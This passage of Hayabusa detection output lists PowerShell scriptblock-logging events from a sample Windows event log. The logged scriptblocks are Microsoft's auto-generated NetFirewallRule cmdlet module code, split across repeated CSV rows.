'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 